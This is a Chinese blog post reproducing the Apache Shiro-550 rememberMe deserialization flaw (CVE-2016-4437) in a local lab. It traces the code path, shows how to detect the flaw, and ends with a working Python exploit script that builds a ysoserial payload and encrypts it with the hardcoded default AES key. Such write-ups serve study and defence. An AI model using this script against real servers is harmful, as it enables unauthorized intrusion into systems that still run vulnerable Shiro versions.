Apache Shiro-550 反序列化漏洞简单分析复现（CVE-2016-4437）

大槐TuT

已于 2022-04-12 12:16:04 修改

阅读量3.6k

点赞数

分类专栏：漏洞复现文章标签：网络安全 java intellij-idea shiro

于 2022-04-12 12:02:41 首次发布

本文链接：https://blog.csdn.net/weixin_44112065/article/details/124120625

版权

漏洞复现专栏收录该内容

6 篇文章 0 订阅

订阅专栏

0x01 影响范围：

Apache Shiro < 1.2.5

0x02 项目简介：

Apache Shiro是一个功能强大、灵活的，开源的安全框架。它可以干净利落地处理身份验证、授权、企业会话管理和加密。

Shiro 针对 Shiro 开发团队所说的“应用程序安全的四个基石”——身份验证、授权、会话管理和密码学：

**身份验证：**有时称为“登录”，这是证明用户是他们所说的人的行为。
**授权：**访问控制的过程，即确定“谁”可以访问“什么”。
**会话管理：**管理特定于用户的会话，即使在非 Web 或 EJB 应用程序中也是如此。
**密码学：**使用密码算法保持数据安全，同时仍然易于使用。

0x03 环境搭建：

下载shiro1.2.4

https://github.com/apache/shiro/tree/shiro-root-1.2.4

然后直接使用IDEA打开samples下的web项目，然后配置好Tomcat
在这里插入图片描述
在web中的pom.xml中添加如下的依赖

<dependency>
    <groupId>taglibs</groupId>
    <artifactId>standard</artifactId>
    <version>1.1.2</version>
    <scope>runtime</scope>
</dependency>

环境搭建成功
在这里插入图片描述

0x04 简单的流程分析：

shrio的框架包包含Shiro-core与Shiro-web，在调试的时候两个包都会用
在这里插入图片描述
在框架中存在反序列化方法，并且存在方法调用了该反序列化方法，向上寻找入口点

找到resolvePrincipals方法，看翻译可以知道这个方法的作用是检验rememberMe的身份，结合上面反序列化方法存在的类（AbstractRememberMeManager）就大概可以猜测到之前的反序列化应该就是对rememberMe的反序列化，一个用户登录成功后会返回一个RememberMe值，可以通过这个值去校验用户
在这里插入图片描述
查看RemeberMe的来源，使用burp登录，校验成功后会返回rememberMe的值

登录成功后再次发包Cookie中就会自带rememberMe的值，并且返回包也没有跳转到login.jsp，表示通过了身份验证

接下来使用带rememberMe值的请求包进行正向调试，调试到getRememberedSerializedIdentity方法，只要rememberMe不是deleteMe那么就会对rememberMe进行base64解码并返回
在这里插入图片描述
会对解码后的字符进行再次解密，解密之后就会进行反序列化操作了

查看decrypt，可以看到是AES解密，AES是一种对称解密，而框架中是存在默认的密钥的，密钥是对一组特定base64值解密得到的

解密完成之后就会顺利地进行反序列化了，因为rememberMe是从Cookie中得到的，而Cookie又是可控的，因此在开发者没有改AES密钥的情况下，这个反序列化点是可控的，满足反序列化的基本条件。
在这里插入图片描述
总结一下触发反序列化的基本流程：

Cookie中的RememberMe --> Base64解密 --> 使用AES密钥解密（密钥存在硬编码） --> 进行反序列化

0x05 shiro550的检测：

首先，使用BurpSuite进行抓包，在请求包中的cookie字段中添加rememberMe=123;，看响应包header中是否返回rememberMe=deleteMe值，若有，则证明该系统使用了Shiro框架
在这里插入图片描述
0x06 结合ysoserial使用URLDNS链简单利用：

1、在本地启动shiro1.2.4

2、下载ysoserial，然后使用脚本进行利用

#!/usr/bin/env python3
# coding:utf-8

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
import requests
def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar','URLDNS', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    url = sys.argv[1]
    command = sys.argv[2]
    payload = encode_rememberme(command)
    cookie = "rememberMe={0}".format(payload.decode())

    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0",
        "Cookie": "{0}".format(cookie)
    }

    requests.get(url=url, headers=headers)